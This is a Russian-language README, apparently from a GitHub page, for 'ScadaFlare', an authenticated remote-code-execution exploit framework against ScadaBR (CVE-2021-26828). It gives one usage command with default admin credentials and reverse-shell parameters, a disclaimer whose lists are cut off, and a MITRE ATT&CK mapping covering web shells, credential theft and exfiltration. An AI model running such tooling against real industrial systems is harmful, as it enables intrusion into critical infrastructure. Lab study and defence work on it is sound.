
ScadaFlare аутентифицированный RCE фреймворк эксплуатации для ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
Модульный эксплойт аутентифицированного RCE, нацеленный на ScadaBR <1.1.0, расширенный для операций красных команд.

.jsp через view_edit.shtmЭтот эксплойт был разработан при анализе сценария HTB Pro Lab: Alchemy. Изначальный PoC от Фелипе Оливейры был качественным, но:
ScadaFlare — это полная переработка на Python 3 с модульной поддержкой, несколькими стратегиями обхода, определением ОС с возможностью переопределения, интеграцией webhook, поддержкой SOCKS-прокси и цепочками перечисления для использования операторами в реальных условиях.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare предназначен исключительно для:
Несанкционированное использование против реальных промышленных систем может:
Используя этот инструмент, вы принимаете полную ответственность за:
Лицензия MIT – см. LICENSE
| Фаза | Техника | ID |
|---|
| Начальный доступ (после аутентификации) | Допустимые учетные записи | T1078 |
| Выполнение | Эксплуатация публичного приложения | T1190 |
| Выполнение команд | Веб-оболочка | T1505.003 |
| Действия с привилегиями | Изменение веб-контента | T1505 |
| Доступ к учетным данным | Учетные данные в конфигурационных файлах | T1552.001 |
| Разведка | Обнаружение удаленных систем | T1018 |
| Экфильтрация | Экфильтрация через веб-сервис | T1567.002 |
| Обход защиты | Туннелирование через прокси и протоколы | T1090 |